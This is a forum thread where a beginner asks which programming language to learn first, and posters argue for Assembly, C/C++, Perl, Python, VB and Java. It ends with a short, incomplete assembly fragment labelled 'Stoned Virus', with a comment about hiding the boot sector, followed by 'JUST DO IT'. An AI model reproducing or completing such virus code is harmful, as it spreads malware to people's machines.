Page 1 of 2 12 LastLast

Thread: good first language to learn....

Question good first language to learn....

what up?, just wantin any advice on a good first language for me to learn. I've seen a few suggestions elsewhere. such as perl, phython,C, C+,ect... though i would like to hear from some of you guys. thanx

Laidher

I think Assembly is actually one of the best. In my personal opinion - I think it passes C,C++,VB...etc.

Perl, however, is also pretty good to start out with.

[P.S.- HTML, Java, and Javascript are also good 'starters']
    ...This Space For Rent.

-[WebCarnage]

Jump in at the deep end, C/C++ then you'll find other languages easier Im tellin you!

Python is pretty useless but its nice language to learn.

Perl is pretty useful, try learn it after C/C++.

VB is dead simple and so is Batch so if your bored go for them also.

Its a tough task but dont give up, programming is essential.

www.programmersheaven.com
    go now!

I agree with WebCarnage. Learn Assembly first. It gives you a good idea of what's going on under the hood. Follow that up with C/C++. Then move on to high level languages.

You guys know Assembly, I bow to you.

I tried but gave up and stuck with good old C/C++

Assembly gets really deep!

Talking

My first programming experiences were BASIC on my TI-83 PLus calcualtor, hehehe, but hey, it worked, and all the other languages arent that hard
    \"Not all humans are reasonably good.\" -John Locke

oblio
    they do not know assembly, they like to throw around the word assembly so they can impress their peers. C and C++ are high level languages by the way. Learning Assembly will not aid you in any way in learning high level languages.

My vote is for VB cause it's very, very easy to learn, and gives you an idea about what other languages are like.
    Why am I still here?

I think Java is a good language to start 'cuz you don't have to mess with pointers in the first place and creating simple Java applet is pretty easy and fun. Garbage collection is also a nice feature that makes programming much easier. Actually, my university teaches Java as an introductory language. But it's totally up to U. Just pick up one language you think "cool" and "degestable".
    Can I get out of this prison?
    Can I stay this prison forever?

I am a cracker
    what up?, just wantin any advice on a good first language for me to learn. I've seen a few suggestions elsewhere. such as perl, phython,C, C+,ect... though i would like to hear from some of you guys. thanx
    Hi Cohiba227 my name is
    mick palmer
    I think I can help you out This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with python It is clean designed, well documented, and kind to beginners. Despite being a good first language, it is a very powerful and flexible and well suited for large projects.

I don't suggest starting with visual basic because they're not portable! Visual Basic is especially awful. The fact that it's a proprietary Microsoft language is enough to disqualify it, and like other Basics it's a poorly-designed language that will teach you bad programming habits.

Try to learn perl is the language that controls many of the "back-end" parts of the web! Most hacked websites have been hacked because the webmaster or designer did not understand hot to construct "safe" CGI scripts using PERL. If that isn't a good enough reason to learn it, then I don't know what is.

If you get in to serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; C++ is similar to C but provides object orientation to the standard C!

Then Assembly (this is very very hard to program in)!

Stoned Virus

PUSH CS POP DS MOV SI,200H MOV DI,0 LODSW CMP AX,[DI] JNZ HIDEHD ; Hide real boot sector in hard drive. LODSW CMP AX,[DI+2] JNZ HIDEHD ;Hide real boot sector in hard drive. JUST DO IT